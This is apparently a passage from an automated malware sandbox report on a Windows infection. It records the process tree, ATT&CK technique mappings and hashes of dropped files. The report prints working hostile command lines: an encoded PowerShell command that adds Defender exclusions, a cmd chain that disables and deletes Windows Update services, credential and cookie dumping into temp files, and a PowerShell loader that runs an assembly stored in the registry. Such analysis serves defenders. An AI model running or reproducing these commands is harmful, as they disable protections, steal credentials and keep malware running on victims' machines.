"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
8⤵
PID:1844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHYAcQBwACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcAB0AGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQB0AGkAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBvAGMAdgAjAD4A"
9⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:1760

C:\Windows\system32\sc.exe
sc stop UsoSvc
9⤵
PID:1708

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
9⤵
PID:472

C:\Windows\system32\sc.exe
sc stop wuauserv
9⤵
PID:1368

C:\Windows\system32\sc.exe
sc stop bits
9⤵
PID:1712

C:\Windows\system32\sc.exe
sc stop dosvc
9⤵
PID:1352

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
9⤵
- Modifies registry key
PID:1620

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
9⤵
- Modifies registry key
PID:1504

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
9⤵
- Modifies registry key
PID:1248

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
9⤵
- Modifies registry key
PID:1216

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1104

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1296

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
9⤵
- Modifies registry key
PID:864

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:1876

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
9⤵
PID:1620

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:2044

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:1184

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:276

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
9⤵
PID:1296

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
9⤵
PID:1488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
9⤵
PID:1504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
9⤵
PID:912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
9⤵
PID:288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
9⤵
PID:972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
8⤵
PID:960

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
8⤵
PID:1732

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "dqmauauueml"
9⤵
PID:276

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe jnrsmhzfyy0 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
8⤵
PID:436

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\n.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1348

C:\Users\Admin\AppData\Local\Temp\n.exe
"C:\Users\Admin\AppData\Local\Temp\n.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708

C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4PnZTFPlWNL2sBxEj3K0lfm+IpmDl1fWL91EsjtUdV9gePUMFukpx1w8bbbUgxdWL/O2Y/SoYLyHJ0UL+yd4I6Qo2xAsTPBudxn8AP93T31cVHxeQT3kKahuJ43jbU6z8=
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
5⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
6⤵
PID:1520

C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
7⤵
- Executes dropped EXE
PID:1996

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
5⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c compile.bat
6⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\hh.exe
C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
7⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\splwow64.exe
C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
7⤵
PID:2156

C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
7⤵
PID:2132

C:\Windows\SysWOW64\cmd.exe
cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\menu.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1780

C:\Users\Admin\AppData\Local\Temp\menu.exe
"C:\Users\Admin\AppData\Local\Temp\menu.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1804

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1B20.tmp\1B21.tmp\1B22.bat C:\Users\Admin\AppData\Local\Temp\menu.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:864

C:\Windows\system32\findstr.exe
findstr /b ::: "C:\Users\Admin\AppData\Local\Temp\menu.exe"
6⤵
PID:1724

C:\Windows\system32\taskeng.exe
taskeng.exe {D71CD943-87DE-416D-B96F-2EC91EAF6D92} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Loads dropped DLL
PID:1520

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:1660

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
1⤵
PID:1504

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
1⤵
PID:1248

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
1⤵
PID:1216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1B20.tmp\1B21.tmp\1B22.bat
Filesize
1KB

MD5
e1bb09383bc07bceda851a5493b9f56f

SHA1
175ffc74d169f99fed6f6296791d7ac48311b3e1

SHA256
43994d120fec720a17cb4c5896456346c2a049c1d99be3125249929a76041851

SHA512
fa23b11844cb59cd3940fa05d5244e33b84d4a58d98844e221b79bd2e415cd3e70d82515f705bea6ab4cc3930e773930119d0e90b1cd48e2cad0e927f86b305e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies1
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
Filesize
28KB

MD5
9db028ef92251d3475aa97b3f4b91536

SHA1
6be1dcadecc2b6f7f071f0812298607e5e1996a0

SHA256
03b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f

SHA512
0db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b

Download Submit
C:\Users\Admin\AppData\Local\Temp\New-Client-Test.exe
Filesize
28KB

MD5
9db028ef92251d3475aa97b3f4b91536

SHA1
6be1dcadecc2b6f7f071f0812298607e5e1996a0

SHA256
03b452e1d1d5a5885a4130370a0418ea65d616f0e2032877c0fb9556c510942f

SHA512
0db98918487cb37d86a7b01d40436599c5e08028c244d19b44f990b5a6df1db504cfe26a046c2959c81a485268c9138b9bc37271b41b66f5b281b9a3cf57e31b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
Filesize
4.4MB

MD5
3405f654559010ca2ae38d786389f0f1

SHA1
8ac5552c64dfc3ccf0c678f6f946ee23719cf43d

SHA256
bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30

SHA512
cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
156B

MD5
eb51755b637423154d1341c6ee505f50

SHA1
d71d27e283b26e75e58c0d02f91d91a2e914c959

SHA256
db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9

SHA512
e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.bat
Filesize
74B

MD5
808099bfbd62ec04f0ed44959bbc6160

SHA1
f4b6853d958c2c4416f6e4a5be8a11d86f64c023

SHA256
f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8

SHA512
e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\compile.vbs
Filesize
265B

MD5
ca906422a558f4bc9e471709f62ec1a9

SHA1
e3da070007fdeae52779964df6f71fcb697ffb06

SHA256
abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee

SHA512
661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b

Download Submit
C:\Users\Admin\AppData\Local\Temp\config
Filesize
108B

MD5
1ba367d0f9aac0f650e65ab7401776c0

SHA1
75cf3295125cfaa0c247ebccc57e63f915198683

SHA256
68c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03

SHA512
45ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh.exe
Filesize
103KB

MD5
4d4c98eca32b14aeb074db34cd0881e4

SHA1
92f213d609bba05d41d6941652a88c44936663a4

SHA256
4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

SHA512
959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

Download Submit
C:\Users\Admin\AppData\Local\Temp\hh.exe
Filesize
103KB

MD5
4d4c98eca32b14aeb074db34cd0881e4

SHA1
92f213d609bba05d41d6941652a88c44936663a4

SHA256
4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

SHA512
959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe
Filesize
90KB

MD5
df1a652f5f40127d986a4ee1742c5f71

SHA1
1fe492fb25950e47e3b1480820a530b4a60aefe1

SHA256
8889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317

SHA512
fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\menu.exe
Filesize
90KB

MD5
df1a652f5f40127d986a4ee1742c5f71

SHA1
1fe492fb25950e47e3b1480820a530b4a60aefe1

SHA256
8889ceb7015576ae3c026b39beb8b1dc620ef0c921ad4fc0ea7fd471ca7dc317

SHA512
fff5a34e316856bf3ff382a4420d3fa7b84eff0018530893328f7e838d7621e43102b91764f522b6f71986b5931c5e322a8da1ba173d2f8dc5a4ed563b44da8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\n.exe
Filesize
4.6MB

MD5
fc2c9d4e84cff08b3b8160b091e72072

SHA1
0dbb89f0ce90cc26cbff09073949cf1e4b6559d9

SHA256
1b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140

SHA512
29d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27

Download Submit
C:\Users\Admin\AppData\Local\Temp\n.exe
Filesize
4.6MB

MD5
fc2c9d4e84cff08b3b8160b091e72072

SHA1
0dbb89f0ce90cc26cbff09073949cf1e4b6559d9

SHA256
1b09ad4d930bb5f1fb4fca4b2603e33b40884ab32f46a61d71cb57ab2d05e140

SHA512
29d164548bc8b189154484d35bc12f8582213196dee71105e1a78ce0e8bfc4e5a483fa2df49b55def044be8c8b4b6685aed096f3d29fa9e51167b4bca2e2ad27

Download Submit
C:\Users\Admin\AppData\Local\Temp\protected.exe
Filesize
4.4MB

MD5
0514c96bcd5d4fb0cee8865fd32c1ba3

SHA1
cd24d7547bb47d87430ab627cca5c8c4acf58971

SHA256
9a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489

SHA512
2bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e

Download Submit
C:\Users\Admin\AppData\Local\Temp\protected.exe
Filesize
4.4MB

MD5
0514c96bcd5d4fb0cee8865fd32c1ba3

SHA1
cd24d7547bb47d87430ab627cca5c8c4acf58971

SHA256
9a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489

SHA512
2bbaddd521e77783805231d0f0afcc6a802d7140d8d857770f7bcb46cbc88555ac9e39974a4ddb50b685eb7a529de5c006b1d53ec5da708d632fa027c73d143e

Download Submit
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
Filesize
391KB

MD5
053778713819beab3df309df472787cd

SHA1
99c7b5827df89b4fafc2b565abed97c58a3c65b8

SHA256
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

SHA512
35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
Filesize
391KB

MD5
053778713819beab3df309df472787cd

SHA1
99c7b5827df89b4fafc2b565abed97c58a3c65b8

SHA256
f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe

SHA512
35a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb

Download Submit
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
Filesize
49KB

MD5
0d8360781e488e250587a17fbefa646c

SHA1
29bc9b438efd70defa8fc45a6f8ee524143f6d04

SHA256
ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

SHA512
940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

Download Submit
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
Filesize
49KB

MD5
0d8360781e488e250587a17fbefa646c

SHA1
29bc9b438efd70defa8fc45a6f8ee524143f6d04

SHA256
ebff7d07efda7245192ce6ecd7767578152b515b510c887ca2880a2566071f64

SHA512
940a98f282473c6f706783b41b72eccce88620e12db1f91be6425f087284746e6e10d4d9420b5e79e87ec3a2fd595b9fe301576e39a4db6bd3daa4aa93a9042e

Download Submit
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
Filesize
184KB

MD5
a776e68f497c996788b406a3dc5089eb

SHA1
45bf5e512752389fe71f20b64aa344f6ca0cad50

SHA256
071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

SHA512
02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

Download Submit
C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
Filesize
184KB

MD5
a776e68f497c996788b406a3dc5089eb

SHA1
45bf5e512752389fe71f20b64aa344f6ca0cad50

SHA256
071e26ddf5323dd9ed6671bcde89df73d78bac2336070e6cb9e3e4b93bde78d1

SHA512
02b1234ad37b768b9bcba74daf16e6b45b777f340dac0b64a85166fdd793955e3d7f88a95142b603b198e504ef1173618f840511bcdb70448f71aed19c009073

Download Submit
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize
4.4MB

MD5
0514c96bcd5d4fb0cee8865fd32c1ba3

SHA1
cd24d7547bb47d87430ab627cca5c8c4acf58971

SHA256
9a427506761771ae017ec3bc96b12b3d49ab5f6a2c64b48b429c9d14cee10489

SHA512
